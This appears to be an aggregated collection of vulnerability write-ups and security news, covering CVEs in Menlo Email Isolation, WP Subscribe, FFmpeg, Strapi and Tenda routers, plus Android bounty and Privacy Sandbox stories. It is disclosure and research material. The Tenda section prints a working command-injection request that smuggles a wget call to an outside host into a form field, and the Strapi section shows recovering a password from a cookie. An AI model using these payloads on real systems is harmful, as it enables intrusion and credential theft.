Links may not be rewritten according to policy in some specially formatted emails.

Uncover the highly evasive adaptive threats (HEAT) causing ransomware attacks.

 

Most Searched

*   Secure Web Gateway (SWG) 101: Your primer to an isolation-based approach to cybersecurity
*   Hiding in plain sight: New Adwind jRAT Variant Uses normal Java commands to mask its behavior
*   U.S. Department of Defense (DoD) leads the industry with cloud-based internet isolation program
*   ISOMorph Infection: In-Depth Analysis of a New HTML Smuggling Campaign
*   Increase In Drive-by Attack: SocGholish Malware Downloads

*   Why Menlo
    
    **Why Menlo**
    
    Traditional security approaches are flawed, costly, and overwhelming for security teams. Menlo Security is different. It’s the simplest, most definitive way to secure work—making online threats irrelevant to your users and your business.
    
    Why Menlo
    
*   Products
    
    **Products**
    
    *   Products Overview
    *   Secure Web Gateway
    *   Remote Browser Isolation
    *   Email Isolation
    *   CASB
    *   DLP
    *   Menlo Private Access
    *   Cloud Firewall
    *   Isolation Security Operations Center
    
*   Solutions
    
    **Solutions**
    
    *   Solutions Overview
    *   Eliminate phishing & ransomware
    *   Seamless ransomware prevention
    *   Gain visibility & control over data loss
    *   Control access to SaaS applications
    *   Implement Secure Access Service Edge (SASE)
    *   Secure access to private applications
    *   Secure Microsoft 365 & Google Workspace
    *   Secure remote work
    *   Mobile malware prevention
    *   Virtual network separation
    *   Neutralize malicious document downloads
    *   Migrate on-premise proxy to Cloud SWG
    
*   Resources
    
    **Threat intelligence is on tap at Menlo Labs**
    
    Menlo Labs provides insights, expertise, context and tools to aid customers on their journey to connect, communicate and collaborate securely without compromise. The collective is made up of elite security researchers that put a spotlight on the threats you know and don’t know about.
    
    Learn More
    
*   About
    
    **Company**
    
    *   About Us
    *   Management Team
    *   Board of Directors
    *   Investors
    *   Customers
    *   Partners
    *   Technology Partners
    *   Contact Us
    

*   Demo

 

Most Searched

*   Secure Web Gateway (SWG) 101: Your primer to an isolation-based approach to cybersecurity
*   Hiding in plain sight: New Adwind jRAT Variant Uses normal Java commands to mask its behavior
*   U.S. Department of Defense (DoD) leads the industry with cloud-based internet isolation program
*   ISOMorph Infection: In-Depth Analysis of a New HTML Smuggling Campaign
*   Increase In Drive-by Attack: SocGholish Malware Downloads

****  
CVE ID: CVE-2022-24974****

Product: Email Isolation On-Premise  
Affected versions: 2.81.1 – 2.81.8  
Fixed in 2.81.9+  
Description: “Links may not be rewritten according to policy in some specially formatted emails.”  
Reported by: Anonymous

CVE-2022-24974: Published security vulnerabilities - Menlo Security

The security vulnerability payout set bug hunters rejoicing, but claiming the reward is much, much easier said than done.

Google has expanded its bug-bounty program to offer a whopping $1.5 million for a top-notch Android 13 Beta exploit – specifically, for a hack of the Titan M security chip that ships with Pixel phones.

Android 13 Beta became available last week to developers and early adopters, with Google promising an outsized focus on privacy and security. It apparently aims to deliver in that department, if the bounty bump is any indication.

The Internet giant announced a 50% bonus for all Android 13 Beta exploits on Twitter and updated its Android program page to reflect the offer, adding an important caveat: "Vulnerabilities must be exclusive to Android 13 and must not reproduce on any other version of Android," it noted.

To take advantage of the largess, bug hunters will need to set off on safari soon: The increased rewards are only good for reports filed before May 27.

**Putting the $1.5M Payout into Context  
**For a sense of perspective on that payout number, it's worth noting that $1.5 million is exponentially larger than the highest-ever bounty for an Android vulnerability, which was paid last year — $157,000 for a critical exploit chain in an unspecified component. It's also half the amount paid out in the entirety of 2021 for Android flaws ($3 million total, across hundreds of exploits), and roughly equal to the sum total of payouts in 2020. So, this is a lot of love for one bug.

That said, the likelihood of seeing a payout that size is a long shot. That's because it would be connected to the last time Google dabbled in big-bucks territory: In 2019, it began offering $1 million to anyone who could hack the Titan M security chip, which is embedded in Google Pixel smartphones. Specifically, it requires a "full chain remote code execution exploit with persistence, which compromises the Titan M secure element on Pixel devices."

But so far, that reward has gone unclaimed. Thus, to reel in the $1.5 million on offer, an ethical hacker would need to not only subvert the never-subverted Titan M, but also make sure the exploit works on Android 13 Beta – and only on Android 13 Beta.

The difficulty scale hasn't deterred some. As one bounty hunter tweeted, "BRB going to sell my soul to the hacker gods to get a full remote code execution exploit chain on the Titan M."

**All Android 13 Beta Exploits Get a Bump  
**Google's other rewards for finding an exploitable security vulnerability in Android are also subject to the 50% bonus for Android 13 Beta. Those run anywhere from $75,000 (for a Device Policy Controller bypass or code execution in a privileged process) to $500,000 (for exfiltrating high-value data secured by Titan M). Most rewards clock in at $250,000.

OEM code (libraries and drivers), Digital Car Keys, kernel, boot-loader, Secure Element code, TrustZone OS and apps, system on chip (SoC), MicroController Unit (MCU), Boot ROM, RAM memory, Flash memory, filesystem, Trusted Execution Environment (TEE), radio units, etc., are all considered eligible targets.

Google Offers $1.5M Bug Bounty for Android 13 Beta

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in MyThemeShop WP Subscribe plugin <= 1.2.12 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

If you aren’t building an email list, you’re missing out on the most powerful and consistent way to drive repeat visitors and customers to your website or blog. With an email list, you become less and less dependent on external sources of traffic, and gain more ability to interact with your blog’s audience.

We at MyThemeShop understand your need, and have developed a unique, cleanly coded, premium subscription plugin. We are now distributing it for FREE to give back to the WordPress community. We have been given so much by the WordPress community, it’s time to give back.

**WP Subscribe** is the only plugin you need to get the perfect subscription forms on your website. With optimized code, it loads before you can even blink your eye. If you’re a website owner, you can make a lot more money than regular blogs, which is why so many marketers focus on creating email lists. With the WP Subscribe plugin, you can do it in a simple yet effective way. Install the plugin, configure the widget and convert visitors into loyal email subscribers.

**Live demos:**

See the WP Subscribe Plugin in action on our demo page: http://demo.mythemeshop.com/sociallyviral/

**Why choose WP Subscribe from MyThemeShop:**

*   It’s the only free all-in-one plugin which offers Aweber, Mailchimp and FeedBurner.
*   Choose between Mailchimp, Aweber or FeedBurner.
*   Options to change text showing in subscription box.
*   Fully responsive.
*   Can be easily customized using custom CSS.
*   Can be used more than once in different sidebars.
*   Super lightweight.
*   Compatible with caching and SEO plugins.
*   Eye-catching design.
*   Position it anywhere where a widget is configured in your theme.

**Support**

All support for this plugin is provided through our forums. If you have not registered yet, you can do so here for **FREE**  
https://mythemeshop.com/#signup

If after checking our Free WordPress video tutorials here:  
https://mythemeshop.com/wordpress-101/  
&  
https://community.mythemeshop.com/tutorials/category/2-free-video-tutorials/

you are still stuck, please feel free to open a new thread, and a member of our support team will be happy to help.

Support link:  
https://community.mythemeshop.com/forum/11-free-plugin-support/

**Help to make it better**

MyThemeShop is a premium WordPress theme provider, and we develop premium plugins in our free time and distribute them for free to give back to the community. Though we take a lot of care while developing anything, we might have missed something useful or important. Please help us make it better by submitting your bug/suggestions/feedback on GitHub.

GitHub link: https://github.com/MyThemeShop/WP-Subscribe/

**Feedback**

If you like this plugin, then please leave us a good rating and review.  
Consider following us on Google+, Twitter, and Facebook

This section describes how to install the plugin and get it working.

1.  Upload the wp-subscribe folder to the to the /wp-content/plugins/ directory
2.  Activate the plugin through the ‘Plugins’ menu in WordPress
3.  You can see **WP Subscribe** widget in widgets section.
4.  Add it in sidebar and footer and configure as you want.
5.  Enjoy!

**Plugin is not working**

Please disable all plugins and check if plugin is working properly. Then you can enable all plugins one by one to find out which plugin is conflicting with WP Subscribe.

Plugin doesnt work anymore on the newest versions of Wordpress. It's a pity, it was a great plugin!

Simple and works, thanks.

Support 0, the plugin removal working only direct na manual from wp folder !

Plugin works great, and the support team is AWESOME! They helped me customize the plugin for two of my websites.

It needs ID from feedburner, mailchip, aweber. If you don't use them, it wont work. Ability to use my hosting service wiill be good. Bacause my website gets very few hits. I cannot afford to use others services. It is better if the plugin is self contained rather than depending on others to deliver emails.

Read all 25 reviews

“WP Subscribe” is open source software. The following people have contributed to this plugin.

Contributors

*    MyThemeShop

**1.2.12**

*   Improved form accessibility

**1.2.11**

*   Added validation for name and email fields

**1.2.10**

*   Changed admin notices

**1.2.9**

*   Updated admin notices

**1.2.8**

*   Added consent field

**1.2.7**

*   Fixed SVN issue

**1.2.6**

*   Fixed PHP notices

**1.2.5**

*   Fixed aweber list issue

**1.2.4**

*   Fixed aweber issues

**1.2.3**

*   Fixed some CSS issues

**1.2.2**

*   Fixed some javascript issues
*   Fixed some credentials in Aweber
*   Improve Mailchimp class
*   Remove notices and warnings on some places
*   Change the behavior of saving mailing service lists

**1.2.1**

*   Provided backward compatibility for CSS
*   Provided backward compatibility for Scoped CSS
*   Remove magnific popup classes from inline form
*   Add loader when submitting form
*   Fixed inline form responsiveness
*   Minify the CSS File

**1.2.0**

*   Whole plugin is re-written in OOP
*   Huge performance Improvements
*   Moved JS and CSS folders inside assets folder
*   Enhanced: Functions are more organized in wps-helpers and wps-functions-options file.
*   Fixed: Missing and in-correct textdomain

**1.1.4**

*   Changed AWeber form URL to HTTPS

**1.1.3**

*   Added option to enable name field
*   Added MyThemeShop tab in “Add Plugins” page

**1.1.2**

*   Removed nonce from frontend

**1.1.0**

*   Replaced Feedburner HTTP link with HTTPS

**1.0.9**

*   Fixed spelling mistake in Pro Notification

**1.0.8**

*   Fixed translation and text domain issue

**1.0.7**

*   Fixed notification closing issue

**1.0.6**

*   Switched to PHP 5 style constructor method for the widget class

**1.0.5**

*   Improvement – input placeholder text hides on click.

**1.0.4**

*   Fixed AWeber signup issue

**1.0.3**

*   Fixed add\_query\_arg vulnerability

**1.0.2**

*   Added double opt-in possibility for Mailchimp

**1.0.1**

*   Fixed Title field saving issue in newly added widget
*   Fixed compatibility with other plugins using Mailchimp API

**1.0**

*   Official plugin release.

CVE-2021-36844: WP Subscribe

An integer overflow vulnerability was found in FFmpeg versions before 4.4.2 and before 5.0.1 in g729_parse() in llibavcodec/g729_parser.c when processing a specially crafted file.

**#9651 closed defect (fixed)**

Reported by:

Owned by:

Priority:

normal

Component:

avcodec

Version:

unspecified

Keywords:

Cc:

Blocked By:

Blocking:

Reproduced by developer:

no

Analyzed by developer:

no

This bug was found by fuzzing the current master branch, to reproduce it you have to build the OSS-Fuzz harness for FFmpeg with ASan and UBsan.  

You can use the scripts in ​https://github.com/google/oss-fuzz/tree/master/projects/ffmpeg with clang as compiler and the following flags:  

CFLAGS='-O1 -fsanitize=address -fsanitize=array-bounds,bool,builtin,enum,float-divide-by-zero,function,integer-divide-by-zero,null,object-size,return,returns-nonnull-attribute,shift,signed-integer-overflow,unreachable,vla-bound,vptr'
CXXFLAGS='-O1 -fsanitize=address -fsanitize=array-bounds,bool,builtin,enum,float-divide-by-zero,function,integer-divide-by-zero,null,object-size,return,returns-nonnull-attribute,shift,signed-integer-overflow,unreachable,vla-bound,vptr'

The sanitizer report when executing the testcase is the following:  

INFO: Seed: 108531316
INFO: Loaded 1 modules   (436082 inline 8-bit counters): 436082 \[0x2f32583, 0x2f9ccf5), 
INFO: Loaded 1 PC tables (436082 PCs): 436082 \[0x1d0bf68,0x23b3688), 
/out/ffmpeg\_DEMUXER\_fuzzer: Running 1 inputs 1 time(s) each.
Running: crashes/ffmpeg\_ffmpeg\_demuxer\_fuzzer/id:000169,sig:06,src:012185,time:73697278,op:havoc,rep:4,trial:1493913
libavcodec/g729\_parser.c:51:23: runtime error: signed integer overflow: 10 \* 808464428 cannot be represented in type 'int'
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior libavcodec/g729\_parser.c:51:23 in 
Assertion next >= 0 || pc->buffer failed at libavcodec/parser.c:240
==1324766== ERROR: libFuzzer: deadly signal
    #0 0x4a20f1 in \_\_sanitizer\_print\_stack\_trace (/out/ffmpeg\_DEMUXER\_fuzzer+0x4a20f1)
    #1 0x19f3828 in fuzzer::PrintStackTrace() (/out/ffmpeg\_DEMUXER\_fuzzer+0x19f3828)
    #2 0x19d8629 in fuzzer::Fuzzer::CrashCallback() (/out/ffmpeg\_DEMUXER\_fuzzer+0x19d8629)
    #3 0x7ffff7e033bf  (/lib/x86\_64-linux-gnu/libpthread.so.0+0x153bf)
    #4 0x7ffff7a3218a in \_\_libc\_signal\_restore\_set /build/glibc-eX1tMB/glibc-2.31/signal/../sysdeps/unix/sysv/linux/internal-signals.h:86:3
    #5 0x7ffff7a3218a in raise /build/glibc-eX1tMB/glibc-2.31/signal/../sysdeps/unix/sysv/linux/raise.c:48:3
    #6 0x7ffff7a11858 in abort /build/glibc-eX1tMB/glibc-2.31/stdlib/abort.c:79:7
    #7 0xa628d2 in ff\_combine\_frame /src/ffmpeg/libavcodec/parser.c:240:5
    #8 0xc9ca5f in g729\_parse /src/ffmpeg/libavcodec/g729\_parser.c:71:9
    #9 0xa5fdd3 in av\_parser\_parse2 /src/ffmpeg/libavcodec/parser.c:164:13
    #10 0x502cca in parse\_packet /src/ffmpeg/libavformat/demux.c:1126:15
    #11 0x4e8013 in read\_frame\_internal /src/ffmpeg/libavformat/demux.c:1240:21
    #12 0x4f343c in avformat\_find\_stream\_info /src/ffmpeg/libavformat/demux.c:2586:15
    #13 0x4cba3e in LLVMFuzzerTestOneInput /src/ffmpeg/tools/target\_dem\_fuzzer.c:192:11
    #14 0x19d9d59 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const\*, unsigned long) (/out/ffmpeg\_DEMUXER\_fuzzer+0x19d9d59)
    #15 0x19c4c69 in fuzzer::RunOneTest(fuzzer::Fuzzer\*, char const\*, unsigned long) (/out/ffmpeg\_DEMUXER\_fuzzer+0x19c4c69)
    #16 0x19c9b72 in fuzzer::FuzzerDriver(int\*, char\*\*\*, int (\*)(unsigned char const\*, unsigned long)) (/out/ffmpeg\_DEMUXER\_fuzzer+0x19c9b72)
    #17 0x19c49f2 in main (/out/ffmpeg\_DEMUXER\_fuzzer+0x19c49f2)
    #18 0x7ffff7a130b2 in \_\_libc\_start\_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #19 0x420e7d in \_start (/out/ffmpeg\_DEMUXER\_fuzzer+0x420e7d)

NOTE: libFuzzer has rudimentary signal handlers.
      Combine libFuzzer with AddressSanitizer or similar for better crash reports.
SUMMARY: libFuzzer: deadly signal

There is an UBSan violation that is likely the root cause of the failed assertion.  
You find the crashing testcase attached, execute it with ./ffmpeg_DEMUXER_fuzzer ./testcase

CVE-2022-1475: #9651 (Assertion next >= 0 || pc->buffer failed at libavcodec/parser.c:240) – FFmpeg

An integer overflow vulnerability was found in FFmpeg 5.0.1 and in previous versions in g729_parse() in llibavcodec/g729_parser.c when processing a specially crafted file.

Strap versions prior to 3.6.9 and 4.1.5 disclose a user's password due to simply base64 encoding it and sticking it in a cookie.

    # Exploit Title: Strapi < 3.6.9 and < 4.1.5 DOCUMENTATION plugin - Storing Passwords in a Recoverable Format# Google Dork: intitle:"Welcome to your Strapi ap"# Shodan search: "X-Powered-By: Strapi <strapi.io>"# Date: 2022-03-30# Exploit Author: Kitchaphan Singchai [idealphase]# Vendor Homepage: https://strapi.io/# Software Link: https://github.com/strapi/strapi/releases# Vulnerable Version: < 3.6.9 and < 4.1.5# Version: 3.6.8# Tested on: Linux# CVE: CVE-2021-46440# Description:Storing passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi version prior 3.6.9 and prior 4.1.5 allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a plaintext password, leading to getting API documentation for further API attacks.# This CVE has been fixed via this Github pull request.- Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)# PoC:[Request]POST /documentation/login HTTP/1.1Host: 127.0.0.1:1337..[SNIP]..password=password[Response]HTTP/1.1 302 FoundSet-Cookie: strapi.sid=eyJkb2N1bWVudGF0aW9uIjoicGFzc3dvcmQiLCJfZXhwaXJlIjoxNjQyNjg2NDQyNzc2LCJfbWF4QWdl Ijo4NjQwMDAwMH0=; path=/; httponlySet-Cookie: strapi.sid.sig=e-5j8FBY8RSWqjALRv2dlPT5_gw; path=/; httponlyX-Powered-By: Strapi <strapi.io>..[SNIP]..Redirecting to <a href="/documentation">/documentation</a>.Perform Base64 decoding and we got plaintext password in “documentation” json key as shown below.{"documentation":"password","_expire":1642686442776,"_maxAge":86400000}# Timeline:19/Jan/2022 - Inform vulnerability to Strapi team20/Jan/2022 - Strapi validate the issue and have found a fix that they plan to review, merge, and release ASAP.8/Feb/2022 - Pull request created on Official Github strapi - Change documentation auth cookie system (https://github.com/strapi/strapi/pull/12246)28/Mar/2022 - Reserved CVE-2021-4644029/Mar/2022 - Reproduce vulnerability on v3.6.9 and v.4.1.5 [Status:Fixed]

Strapi 3.6.8 Password Disclosure / Insecure Handling

Tenda AX1806 v1.0.0.1 was discovered to contain a command injection vulnerability in `SetIPv6Status` function

**Tenda AX18 v1.0.0.1 has a commend injection vulnerability****Overview**

*   **Type**: command injection vulnerability
*   **Vendor**: Tenda (https://tenda.com.cn)
*   **Products**: WiFi Router AX1806 v1.0.0.1 and AX1803 v1.0.0.1
*   **Firmware download address:** https://tenda.com.cn/download/detail-3225.html
*   **Firmware download address:** https://www.tenda.com.cn/product/download/AX1806.html

**Description****1.Product Information:**

Tenda AX1806 v1.0.0.1 and AX1803 v1.0.0.1 router, the latest version of simulation overview：

**2\. Vulnerability details**

Tenda AX1806 and AX1803 was discovered to contain a command injection vulnerability in SetIPv6Status function

When we set connect type = PPPoE we will get a command injection vulnerability after login.

**3\. Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/setIPv6Status HTTP/1.1
    Host: 192.168.2.1
    Connection: close
    Content-Length: 191
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
    Accept: */*
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36
    sec-ch-ua-platform: "macOS"
    Origin: https://192.168.2.1
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://192.168.2.1/main.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: password=edeff4d6d98974e46457a587e2e724a2ndy5gk
    
    IPv6En=1&conType=PPPoE&ISPusername=addasdas&ISPpassword=$(wget http://192.168.2.2:9999/)&prefixDelegate=0&wanAddr=%2F&gateWay=&lanType=undefined&wanPreDNS=&wanAltDNS=&lanPrefix=undefined%2F64

CVE-2022-28572: CVEIDs/TendaAX18 at main · F0und-icu/CVEIDs

CVE-2022-28572: TempName/TendaAX18 at main · F0und-icu/TempName

Users should patch immediately

A security vulnerability in a mobile device management software could allow attackers access to organizations’ internal and cloud networks, researchers warn.

Discovered by Assetnote, the server-side request forgery (SSRF) bug was found in VMWare Workspace One UEM.

Tracked as CVE-2021-22054, the vulnerability could risk credentials and other sensitive data falling into the hands of malicious attackers.

Read more of the latest news about security vulnerabilities

“We discovered a pre-authentication vulnerability that allowed us to make arbitrary HTTP requests, including requests with any HTTP method and request body,” the researchers wrote in a blog post.

“In order to exploit this SSRF, we had to reverse engineer the encryption algorithm used by VMWare Workspace One UEM.”

The team were able to breach “a number of” organizations using the software, accessing both their internal network and cloud services.

DON’T MISS VirusTotal debunks claims of a serious vulnerability in Google-owned antivirus service

Speaking to The Daily Swig, Assetnote’s Subham Shah said: “While I cannot share exact details about what companies were effected, there were a large number of enterprises that were vulnerable to this.

“In some cases, it was possible to use this vulnerability to breach the AWS accounts of the companies.”

Shah added: “The impact of this vulnerability is rather on the organization running the software, instead of the individual users that are using the products.

“Using the SSRF vulnerability, it is possible to reach arbitrary hosts on the internal network. On cloud networks such as AWS, it is possible to reach the metadata IP address and potentially steal security credentials.

“Using these security credentials, it is possible to escalate the vulnerability to gain access to other infrastructure belonging to a company.”

**Remediations**

The issue, which was first discovered in November 2021, has since been patched by the vendor.

Shah said that while VMware dealt with the issues “in a timely manner”, researchers agreed to the vendor’s request for more time to release more patches and allow customers to patch their instances before disclosure.

An advisory from VMWare contains details of fixes for the software.

Shah advised users of mobile management device software “if possible, do not expose the MDM solution to the external internet”.

YOU MAY ALSO LIKE IBM database updates address critical vulnerabilities in third-party XML parser

Security bug in VMWare Workspace ONE could allow access to internal, cloud networks

Google has officially released the first developer preview for the Privacy Sandbox on Android 13, offering an "early look" at the SDK Runtime and Topics API to boost users' privacy online.
"The Privacy Sandbox on Android Developer Preview program will run over the course of 2022, with a beta release planned by the end of the year," the search giant said in an overview.
A "multi-year effort,"

Google has officially released the first developer preview for the **Privacy Sandbox** on Android 13, offering an "early look" at the SDK Runtime and Topics API to boost users' privacy online.

"The Privacy Sandbox on Android Developer Preview program will run over the course of 2022, with a beta release planned by the end of the year," the search giant said in an overview.

A "multi-year effort," Privacy Sandbox on Android aims to create technologies that's both privacy-preserving as well as keep online content and services free without having to resort to opaque methods of digital advertising.

The idea is to limit sharing of user data with third-parties and operate without cross-app identifiers, including advertising ID, a unique, user-resettable string of letters and digits that can be used to track users as they move between apps.

Google originally announced its plans to bring Privacy Sandbox to Android earlier this February, following the footsteps of Apple's App Tracking Transparency (ATT) framework.

Integral to the proposed initiative are two key solutions —

*   **SDK Runtime**, which runs third-party code in mobile apps such as software development kits (SDKs), including those for ads and analytics, in a dedicated sandbox, and

*   **Topics API**, which gleans "coarse-grained" interest signals on-device based on a user's app usage that are then shared with advertisers to serve tailored ads without cross-site and cross-app tracking

To address criticisms that the model could possibly give Google an unfair advantage, the tech behemoth noted that the privacy-oriented systems will be developed as part of the Android Open Source Project (AOSP) to ensure transparency into the design and implementation of these solutions.

"Android will collaborate with the entire industry and app ecosystem on the journey to a more privacy-first mobile platform, and one which supports a rich diversity of value-exchange that benefits users, developers, and advertisers," the company said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google